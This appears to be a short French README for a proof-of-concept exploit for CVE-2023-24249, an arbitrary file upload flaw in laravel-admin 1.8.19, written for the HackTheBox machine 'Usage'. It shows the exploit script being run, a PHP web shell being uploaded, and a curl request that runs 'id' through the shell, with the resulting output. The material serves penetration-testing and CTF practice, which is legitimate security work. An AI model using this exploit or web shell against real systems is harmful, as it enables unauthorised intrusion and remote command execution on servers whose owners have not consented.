
Preuve de concept d'exploitation pour CVE-2023-24249, une vulnérabilité de téléchargement arbitraire de fichiers dans laravel-admin, permettant le déploiement d'un web shell pour les tests d'intrusion et les défis CTF.
CVE-2023-24249 est une vulnérabilité de téléversement arbitraire de fichiers dans laravel-admin v1.8.19. Cette preuve de concept exploite la vulnérabilité pour téléverser un web shell.
L'exploit a été écrit pour être utilisé contre la machine facile HackTheBox Usage.
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php
curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id
uid=1000(dash) gid=1000(dash) groups=1000(dash)